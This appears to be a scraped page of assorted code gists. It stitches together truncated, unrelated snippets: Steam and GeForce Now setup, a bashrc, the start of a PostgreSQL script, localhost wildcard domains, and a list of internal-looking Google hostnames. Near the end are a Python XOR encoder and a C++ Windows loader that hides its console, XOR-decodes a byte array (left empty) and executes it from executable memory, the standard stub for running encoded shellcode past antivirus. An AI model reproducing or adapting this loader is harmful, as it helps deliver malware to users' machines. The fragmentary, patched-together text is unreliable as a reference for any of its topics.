$HOME/.steam/steam/steam_dev.cfg
unShaderBackgroundProcessingThreads 6
@nClientDownloadEnableHTTP2PlatformLinux 0
@cMaxInitialDownloadSources 15
$HOME/.steam/steam/steam_dev.cfg
unShaderBackgroundProcessingThreads 6
@nClientDownloadEnableHTTP2PlatformLinux 0
@cMaxInitialDownloadSources 15
If you want to setup the official GeforceNow app on Linux for gaming, use:
flatpak install -y --user flathub org.freedesktop.Sdk//24.08 org.freedesktop.Platform//24.08
flatpak remote-add --user --if-not-exists GeForceNOW https://international.download.nvidia.com/GFNLinux/flatpak/geforcenow.flatpakrepo
flatpak install -y --user GeForceNOW com.nvidia.geforcenow
flatpak run com.nvidia.geforcenow
flatpak override --user --nosocket=wayland com.nvidia.geforcenow
, then launch again.Alternatively:
#
# ~/.bashrc
#
# If not running interactively, don't do anything
[[ $- != *i* ]] && return
[[ "$SHELL" != */fish ]] && [ -x /usr/bin/fish ] && \
SHELL=/usr/bin/fish exec fish
The repository for the assignment is public and Github does not allow the creation of private forks for public repositories.
The correct way of creating a private frok by duplicating the repo is documented here.
For this assignment the commands are:
git clone --bare [email protected]:usi-systems/easytrace.git
#!/bin/bash | |
# PostgreSQL connection parameters | |
PG_USER="postgres" | |
PG_HOST="localhost" | |
PG_PORT="5432" | |
# Get a list of databases | |
databases=$(psql -U $PG_USER -h $PG_HOST -p $PG_PORT -q -t -c "SELECT datname FROM pg_database") |
It turns out that some kind hearted people already set up wildcard domains for you already. You can use any domain below and/or any subdomain of these and they currently resolve to 127.0.0.1 but could switch at any time to resolve somewhere else. Here's the list of ones I know about. Let me know if there are more!
localhost
- It will always works. Do you know why? I hope so.[*.]fbi.com
- 👏 👏 👏 👏 👏[*.]localtest.me
[*.]127-0-0-1.org.uk
[*.]vcap.me
[*.]yoogle.com
I hereby claim:
To claim this, I am signing this object:
#!/usr/bin/env python2 | |
import sys | |
KEY = 'x' | |
def xor(data, key): | |
key = str(key) | |
l = len(key) | |
output_str = "" | |
for i in range(len(data)): | |
current = data[i] | |
current_key = key[i % len(key)] |
#include <windows.h> | |
#include <iostream> | |
int main(int argc, char **argv) { | |
ShowWindow(GetConsoleWindow(), SW_HIDE); | |
char b[] = { }; | |
char c[sizeof b]; | |
for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';} | |
void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
memcpy(exec, c, sizeof c); | |
((void(*)())exec)(); |
rate-limited-proxy-209-85-238-203.google.com | |
quagmire.corp.google.com | |
mail-ed1-f116.google.com | |
pub-8613501904892077.afd.ghs.google.com | |
corpnat-104-132-246-81.corp.google.com | |
corpnat-104-133-102-87.corp.google.com | |
moon.google.com | |
googleproxy-66-249-83-111.google.com | |
rate-limited-proxy-72-14-199-162.google.com | |
mail-vk1-f209.google.com |